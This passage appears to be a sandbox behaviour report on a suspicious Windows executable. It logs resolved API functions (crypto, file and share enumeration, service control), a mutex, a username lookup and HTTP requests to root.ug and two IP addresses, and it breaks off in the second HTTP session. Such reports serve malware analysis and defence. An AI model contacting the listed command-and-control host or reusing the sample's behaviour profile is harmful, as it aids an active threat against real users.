Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\e0a7.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75704f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75701252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75704208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x7570359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x76f20fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x76f19d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75705235	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x7570588e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x7570435f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x757049d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75701856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x7570186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x75703519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x7571d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75707a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x75701b00	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x76981635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x769a1ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x769dd918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x769a3fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x7697f48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x74792dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x74792f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x74793058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x74d3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x74d9be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x74d3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x74d630f1	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x74d45c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x74d4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x74d49197	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x745e26e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x75cca1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x75ccbb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75cc3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x75cc45bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x75cc81ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x75cbd65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x75cead1a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x7570110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x75703587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x75705223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x757053c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75704435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x757017d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75705a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x757034c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x7570103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7571c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x75704259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75701136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75705371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75701282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x7571ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75701986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x75705063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x7570170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x7570492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x757010ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x7572830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x75704620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x7572d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x75701072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75703ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75703f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x75722b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x757033a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x75705929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x7570192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75701700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x7570469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x7572594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x757059e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x757011c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x757011a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75701222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x75719af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75704442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75728baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x7570168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x7570183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x757014b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x7572896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7572828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x75704c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x75784691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7572735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75701410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x757089b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75702d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x75723102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x75705444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x75722a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x7571cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x757034b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x7570dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x7571174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75704950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x75705558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x75704467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x7572d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x757034d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x757014fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x757011e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x757049ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x75701916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x757087c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7572772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x757051cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x757051e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x757011f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75701725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x75704d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x76f145f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x7570465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x757058a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x75701946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x76f13002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x7570495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x76f0e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x75703c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x7571ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x75703da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x7578425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x757234d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x7571f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x75703bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x757017b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x757a7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x75701328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x76f21f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x7578454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x7571ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x757051b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x75703531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x75704a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x75727aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x757a739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7572d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x75708a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x7572d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x76f02270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x76f022b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x757840d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x757014e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75701450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x757017ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75705189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x757014c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x7570e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x75703509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75701809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x7571ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7572d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x7570179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x75704493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x757054ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75704a5d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x759c88f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x759c7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x759cb17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x759d0dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x759c7136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x759c8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x759d3559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x76f125dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x759d05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x759c8bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x75a1fd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x759c787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x759c9abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x759c9a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x759c9679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x759c78e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x74e5df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x74e5df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x74e5ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x74e5ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x74e5e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x74e6157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x74e5df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x74e614d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x74e6469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x74e5df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x74e77144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x74e6468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x74e5df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x74e7779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x74e5c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x74e62a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x74e646ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x74e6369c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x75da17bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x75d9e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75d29ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x75f57078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75d31e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x75acb636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75ad7259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75af86d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75af9d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x76a5fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x76a54642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x76a53eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x76a53ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x76a53e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x76a53f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x76a55dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x76a54af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x745c9263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x750ab131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x750a311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x750b7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x7444572c	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x7443436b	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x75835d77	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7438c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75704d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x7578410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75784195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x7570d31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7571ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x76f2441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x76f4c50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x76f4c381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x7571f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x76f305d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x76f4ca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x76f00b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x76fbfde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x76f51e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x75784761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x7577cd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x7578424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x757846b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x75796676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75784751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x757965f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x757847c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x757847e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x757847f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x7571eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x74e41544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x74e41408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x74e4152c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x75d95708	58	Fn

User (1)

Operation	Additional Information	Success	Count	Logfile
Get Username	user_name_out = 5p5NrGJn0jS HALPmcxz		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	LPCWSTRszTitle	class_name = LPCWSTRszWindowClass, wndproc_parameter = 0		1	Fn

Keyboard (249)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_CODEPAGE, result_out = 437		249	Fn

System (151)

Operation	Additional Information	Count	Logfile
Sleep	duration = 100 milliseconds (0.100 seconds)	143	Fn
Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2019-05-05 17:42:07 (UTC)	1	Fn
Get Time	type = Ticks, time = 52634	1	Fn
Get Time	type = Performance Ctr, time = 5767477893	1	Fn
Get Time	type = System Time, time = 2019-05-05 17:42:11 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 6195704575	1	Fn
Get Info	type = Operating System	1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}		1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Network Behavior

HTTP Sessions (5)

Information	Value
Total Data Sent	3.11 KB
Total Data Received	13.83 KB
Contacted Host Count	2
Contacted Hosts	77.123.139.189, 46.232.113.12

HTTP Session #1

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	root.ug
Server Port	80
Username	-
Password	-
Data Sent	680 bytes
Data Received	1.66 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = root.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php?pid=E3674298AE18BF5A335DF90DDA3F669F	1	Fn
Read Response	size = 1024, size_out = 257	1	Fn Data
Close Session	-	1	Fn

HTTP Session #2

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	root.ug
Server Port	80
Username	-
Password	-
Data Sent	680 bytes
Data Received	1.66 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
